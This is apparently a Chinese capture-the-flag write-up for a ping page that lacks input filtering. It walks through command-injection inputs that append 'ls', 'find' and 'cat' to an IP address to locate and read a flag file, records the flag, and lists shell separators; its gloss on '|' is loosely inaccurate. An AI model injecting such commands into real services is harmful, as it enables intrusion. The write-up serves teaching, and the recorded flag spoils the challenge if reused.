1.阅读题目,小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗,打开页面如下图所示。
2.可以看到就是具备ping功能的页面,试试命令注入手法,可以看到爆出了index.php
3.使用cat命令打开查看index.php的内容,发现没作用,那么换个思路,先看看这是什么操作系统,这次试试ls命令,发现执行了,说明这是linux系统。
4.这次试试显示根目录,127.0.0.1 | ls -l /,还是没得到有价值的信息。
5.这次尝试直接搜索和flag相关的文件,127.0.0.1 | find / -name "*flag*",看到了home目录下有个flag.txt。
6.输入cat命令看一看文件127.0.0.1 | cat /home/flag.txt
7.得到flag:cyberpeace{09aa0da506a3258018aded9b34b2ad66}
总结:命令注入通常是因为开发者没有对特殊字符进行过滤所造成的的一种漏洞。
参考资料:
command1 & command2 :两个命令都执行
command1 && command2 :与执行,第一个成功执行第二个才会执行
command1 | command2 :或执行,只执行第二个
command1 || command2:第一个执行成功,第二个不执行。第一个执行失败,第二个执行
|